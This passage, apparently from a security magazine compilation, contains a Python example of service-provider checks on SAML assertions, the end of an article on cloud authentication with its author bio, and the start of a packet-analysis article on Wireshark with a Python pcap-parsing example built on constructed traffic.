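To make the service-provider side of the SAML exchange concrete, here is an added Python example (not from the article, and not from any SAML product) of the checks a service provider must run on an assertion before trusting it: the issuer is the expected identity provider, the audience and recipient are this service provider, the validity window covers the current time, and the response answers a request this provider actually issued. The response XML, entity IDs, URLs and request IDs are constructed. Verifying the XML signature is assumed to happen first with an XML-DSig library; the standard library cannot do that, so it is not shown.

```python
"""Service-provider checks on a SAML 2.0 Response (added example).

Assumes the XML signature over the assertion has already been verified with an
XML-DSig library; what remains is checking that the assertion is meant for us,
is current, and answers a request we sent.
"""
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

NS = {
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
}
# Constructed identifiers for this example's service provider and IdP.
IDP_ISSUER = "https://idp.example.test/metadata"
SP_ENTITY_ID = "https://sp.example.test/metadata"
ACS_URL = "https://sp.example.test/acs"

# Constructed response (signature element omitted, see module docstring).
SAMPLE_RESPONSE = """<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
    ID="_resp1" InResponseTo="_req42" Version="2.0" IssueInstant="2014-03-10T10:00:00Z">
  <saml:Issuer>https://idp.example.test/metadata</saml:Issuer>
  <samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status>
  <saml:Assertion ID="_a1" Version="2.0" IssueInstant="2014-03-10T10:00:00Z">
    <saml:Issuer>https://idp.example.test/metadata</saml:Issuer>
    <saml:Subject>
      <saml:NameID>alice@example.test</saml:NameID>
      <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
        <saml:SubjectConfirmationData InResponseTo="_req42"
            Recipient="https://sp.example.test/acs" NotOnOrAfter="2014-03-10T10:05:00Z"/>
      </saml:SubjectConfirmation>
    </saml:Subject>
    <saml:Conditions NotBefore="2014-03-10T09:59:00Z" NotOnOrAfter="2014-03-10T10:05:00Z">
      <saml:AudienceRestriction><saml:Audience>https://sp.example.test/metadata</saml:Audience></saml:AudienceRestriction>
    </saml:Conditions>
  </saml:Assertion>
</samlp:Response>"""


def parse_saml_time(value):
    """SAML timestamps are xs:dateTime in UTC with a trailing Z."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def validate_response(xml_text, expected_issuer, sp_entity_id, acs_url, outstanding_request_ids, now):
    """Return (subject, problems); subject is None whenever problems is non-empty.

    outstanding_request_ids: IDs of AuthnRequests this SP issued and has not yet
    consumed. Requiring a match rejects unsolicited or replayed responses.
    """
    problems = []
    root = ET.fromstring(xml_text)
    status = root.find("samlp:Status/samlp:StatusCode", NS)
    if status is None or not status.get("Value", "").endswith(":Success"):
        problems.append("status is not Success")
    if root.get("InResponseTo") not in outstanding_request_ids:
        problems.append("response does not match an outstanding request")

    assertion = root.find("saml:Assertion", NS)
    if assertion is None:
        return None, problems + ["no assertion present"]

    for issuer_el in (root.find("saml:Issuer", NS), assertion.find("saml:Issuer", NS)):
        if issuer_el is None or issuer_el.text != expected_issuer:
            problems.append("unexpected issuer")
            break

    cond = assertion.find("saml:Conditions", NS)
    if cond is None:
        problems.append("assertion carries no Conditions")
    else:
        if "NotBefore" in cond.attrib and now < parse_saml_time(cond.get("NotBefore")):
            problems.append("assertion not yet valid")
        if "NotOnOrAfter" in cond.attrib and now >= parse_saml_time(cond.get("NotOnOrAfter")):
            problems.append("assertion expired")
        audiences = [a.text for a in cond.findall("saml:AudienceRestriction/saml:Audience", NS)]
        if sp_entity_id not in audiences:
            problems.append("assertion not addressed to this service provider")

    scd = assertion.find("saml:Subject/saml:SubjectConfirmation/saml:SubjectConfirmationData", NS)
    if scd is None:
        problems.append("no bearer SubjectConfirmationData")
    else:
        if scd.get("Recipient") != acs_url:
            problems.append("assertion was not meant for this assertion consumer URL")
        if scd.get("InResponseTo") not in outstanding_request_ids:
            problems.append("subject confirmation does not match an outstanding request")
        if "NotOnOrAfter" in scd.attrib and now >= parse_saml_time(scd.get("NotOnOrAfter")):
            problems.append("bearer confirmation expired")

    name_id = assertion.find("saml:Subject/saml:NameID", NS)
    if name_id is None or not name_id.text:
        problems.append("no NameID in subject")
    return (name_id.text, []) if not problems else (None, problems)
```

Every failed check is collected rather than returned at the first failure, so a rejected login can be logged with the full reason list; a service provider that skips the audience or InResponseTo checks will accept an assertion that was issued for a different application or captured from an earlier session.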

MAKE SECURE AUTHENTICATION YOUR GOAL

Cloud services offer convenient remote access to organizations, but they can also open the door for identity theft if the cloud security system relies on outdated methods such as usernames and passwords. The threat is real, and growing, so organizations must scrutinize the security that a cloud provider offers before closing a deal and make secure, authenticated cloud access for end-users their goal regardless of whether it's offered by the cloud provider. For their part, cloud providers must make it their goal to create a secure and easy-to-use authentication method. The stakes are too high not to.

ABOUT THE AUTHOR

David Hald is a founding member of SMS PASSCODE A/S, where he acts as a liaison and a promoter of the award-winning SMS PASSCODE multi-factor authentication solutions. Prior to founding SMS PASSCODE A/S, he was a co-founder and CEO of Conecto A/S, a leading consulting company within the area of mobile and security solutions with special emphasis on Citrix, Blackberry and other advanced mobile solutions. In Conecto A/S David has worked with strategic and tactical implementation in many large IT projects. David has also been CTO in companies funded by Teknologisk Innovation and Vækstfonden. Prior to founding Conecto, he worked as a software developer and project manager, and headed up his own software consulting company. David has a technical background from the Computer Science Institute of Copenhagen University (DIKU).


PACKET ANALYSIS WITH WIRESHARK AND PCAP ANALYSIS TOOLS

by Eric A. Vanderburg

Almost every computer today is connected. Their communication with others takes the form of packets which can be analyzed to determine the facts of a case. Packet sniffers are also called network analyzers, as they help in monitoring every activity that is performed over the Internet. The information from packet sniffing can be used to analyze the data packets that uncover the source of problems in the network. The important feature of packet sniffing is that it captures data that travels through the network, irrespective of the destination. A log file will be generated at the end of every operation performed by the packet sniffer and the log file will contain the information related to the packets.

Every packet has a header and body, where the header contains information about the source of the packet and the body contains the actual information about the transfer. There are packet sniffer tools that are available online and many of them are open source tools and hence they are available free of cost. How, when and where should this be performed to collect the best data in a defensible manner? Attend this workshop to find out.

WHAT IS PACKET ANALYSIS?

Investigations cannot always be contained to a single computer, especially with the way systems are connected these days. Right now, your computer may be connected to dozens of different computers, some to check for software updates, others to gather tweets, email, or RSS feeds. Some connections could be used to authenticate to a domain or access network resources. Now consider an investigation and the potential importance this information could have to it.


Network communication over an Internet Protocol (IP) network can best be understood as a set of packets that form a communication stream. A machine may send and receive thousands of packets per minute and computer networks are used to send these packets to their destination. Packet capture tools can be used to analyze this communication to determine how a computer or user interacted with other devices on the network. Packet analysis can capture these packets so that they can be reviewed to determine what communication took place.

Packet analysis is also called packet sniffing or protocol analysis. A tool that is used for packet analysis is called a packet sniffer or packet capture tool. It captures raw data across the wire, which helps in analyzing which parties are communicating on the network, what data is flowing, how much data is being transmitted and what network services are in use.

PACKET SNIFFING PROCESS

Packet sniffing can be divided into three steps. The first step is collection, when the software gathers all data traversing the network card it is bound to. Next, the data is converted to a form that the program can read and lastly, the program presents the data to be analyzed and can perform pre-programmed analysis techniques on the data.
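The three steps above, and the tcpdump/Wireshark extraction described in the cloud network forensics article earlier on this page, can be followed in code. This added Python example (not code from the article, nor from tcpdump or Wireshark) builds a small capture in memory in the classic pcap file format that both tools write, decodes the pcap records and the Ethernet, IPv4 and TCP headers, and presents a per-conversation summary with any HTTP request lines found in the payload. Addresses, ports and payloads are constructed; only Ethernet/IPv4/TCP frames are decoded and anything else is counted as skipped.

```python
"""Reading a pcap capture and summarizing its TCP conversations (added example)."""
import struct
from collections import defaultdict

PCAP_MAGIC = 0xA1B2C3D4  # classic libpcap magic as written by a little-endian host
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
TCP_SYN, TCP_PSH, TCP_ACK = 0x02, 0x08, 0x10
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ")


def _ip(addr):
    """Dotted-quad string -> 4 raw bytes."""
    return bytes(int(o) for o in addr.split("."))


def build_tcp_frame(src, dst, sport, dport, flags, seq, payload=b""):
    """Construct an Ethernet/IPv4/TCP frame (test data; checksums left at zero)."""
    eth = bytes.fromhex("001122334455" "66778899aabb") + struct.pack("!H", ETHERTYPE_IPV4)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64,
                     IPPROTO_TCP, 0, _ip(src), _ip(dst))
    return eth + ip + tcp


def build_pcap(frames):
    """Wrap frames in a pcap file: 24-byte global header, 16-byte record headers."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1394445600 + i, 0, len(frame), len(frame)) + frame
    return out


# Constructed capture: a three-way handshake and one HTTP request/response,
# plus an ARP frame (ethertype 0x0806) that the decoder must skip, not choke on.
CLIENT, SERVER = "192.0.2.10", "198.51.100.20"
SAMPLE_PCAP = build_pcap([
    build_tcp_frame(CLIENT, SERVER, 40000, 80, TCP_SYN, 1000),
    build_tcp_frame(SERVER, CLIENT, 80, 40000, TCP_SYN | TCP_ACK, 5000),
    build_tcp_frame(CLIENT, SERVER, 40000, 80, TCP_ACK, 1001),
    bytes.fromhex("ffffffffffff0011223344550806") + bytes(28),
    build_tcp_frame(CLIENT, SERVER, 40000, 80, TCP_PSH | TCP_ACK, 1001,
                    b"GET /login.php?user=admin HTTP/1.1\r\nHost: www.example.test\r\n\r\n"),
    build_tcp_frame(SERVER, CLIENT, 80, 40000, TCP_PSH | TCP_ACK, 5001,
                    b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),
])


def read_pcap(data):
    """Collection stage: yield (timestamp, frame) records, honouring the byte
    order announced by the magic number."""
    magic = struct.unpack_from("<I", data, 0)[0]
    if magic == PCAP_MAGIC:
        end = "<"
    elif magic == struct.unpack("<I", struct.pack(">I", PCAP_MAGIC))[0]:
        end = ">"
    else:
        raise ValueError("not a classic pcap file")
    if struct.unpack_from(end + "I", data, 20)[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack_from(end + "IIII", data, off)
        off += 16
        yield ts_sec + ts_usec / 1e6, data[off:off + incl_len]
        off += incl_len


def decode_tcp(frame):
    """Conversion stage: (src, dst, sport, dport, flags, payload) for an
    Ethernet/IPv4/TCP frame, or None for anything else."""
    if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack_from("!H", ip, 2)[0]
    if ip[9] != IPPROTO_TCP or len(ip) < total_len or total_len < ihl + 20:
        return None
    ip = ip[:total_len]  # drop Ethernet padding, if any
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:]
    sport, dport = struct.unpack_from("!HH", tcp, 0)
    doff = (tcp[12] >> 4) * 4
    return src, dst, sport, dport, tcp[13], tcp[doff:]


def summarize(pcap_bytes):
    """Presentation stage: both directions of a conversation share one key;
    report packet/byte counts, handshake flags and HTTP request lines."""
    flows = defaultdict(lambda: {"packets": 0, "bytes": 0, "syn": 0, "syn_ack": 0, "requests": []})
    skipped = 0
    for _ts, frame in read_pcap(pcap_bytes):
        dec = decode_tcp(frame)
        if dec is None:
            skipped += 1
            continue
        src, dst, sport, dport, flags, payload = dec
        f = flows[tuple(sorted([(src, sport), (dst, dport)]))]
        f["packets"] += 1
        f["bytes"] += len(frame)
        if flags & TCP_SYN:
            f["syn_ack" if flags & TCP_ACK else "syn"] += 1
        if payload.startswith(HTTP_METHODS):
            f["requests"].append(payload.split(b"\r\n", 1)[0].decode("ascii", "replace"))
    return {"flows": dict(flows), "skipped_frames": skipped}


if __name__ == "__main__":
    for key, f in summarize(SAMPLE_PCAP)["flows"].items():
        print(key, f)
```

Replacing `SAMPLE_PCAP` with the bytes of a file written by `tcpdump -w` or saved from Wireshark gives the same summary for real traffic; the conversation key is sorted so that a request and its reply land in the same entry, which is what lets the request lines be read as one exchange rather than two unrelated packets.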

OSI NETWORK MODEL

Before you can analyze packets, you need to understand how network communication takes place. The OSI network model is a conceptual framework that describes the activities performed to communicate on a network.

TOOLS

There are various packet sniffing tools available on the market. Some popular packet capture tools include Wireshark, Network Miner and NetWitness Investigator, which we will see in detail. All three of these tools are free to download and use and they can be operated in both command line program format and GUI format.

Of the three, Wireshark is the most popular packet sniffer tool that is used worldwide for its ease of installation, ease of use, etc. More importantly, it is an open source tool that is available free of cost. The tool also provides advanced options that enable forensic investigators or network administrators to delve deep into the packets and capture information. It supports numerous operating systems, protocols, and media types.

There are numerous packet sniffer tools available for network administrators to analyze and understand the traffic flow across the network. It is always difficult to zero in on the best of the lot, as almost all of them perform the required functions seamlessly. Still, there are factors by which they can be ranked and classified as the top packet sniffing tools. The following three tools are identified as the best in the market, already serving millions of computers by identifying serious threats. Let's get into detail with each of the three packet sniffing tools and understand why they are ranked in such order.

WIRESHARK

Wireshark is a popular open source packet sniffer that performs functions such as network troubleshooting, data analysis, protocol development, etc. The tool is built on the latest available platforms and user interface toolkits: the development version of Wireshark uses Qt, while the current releases use the GTK+ toolkit. The major advantage of using Wireshark is that it supports multiple platforms, operating systems and protocols. Wireshark comes in both a graphical user interface (GUI) format and a command-line format. Wireshark can put the network interface controller into promiscuous mode, which makes it possible to capture all the traffic flowing across the network segment as packets. Otherwise, only data that is routed to the capturing host would be captured.

Wireshark supports various protocols and media types. The approximate number of protocols supported by Wireshark is more than 900, and this count keeps increasing as and when an update is released. The primary reason for the increase in the count of supported protocols is the open source nature of the tool. Developers have the freedom to develop code for including their new protocol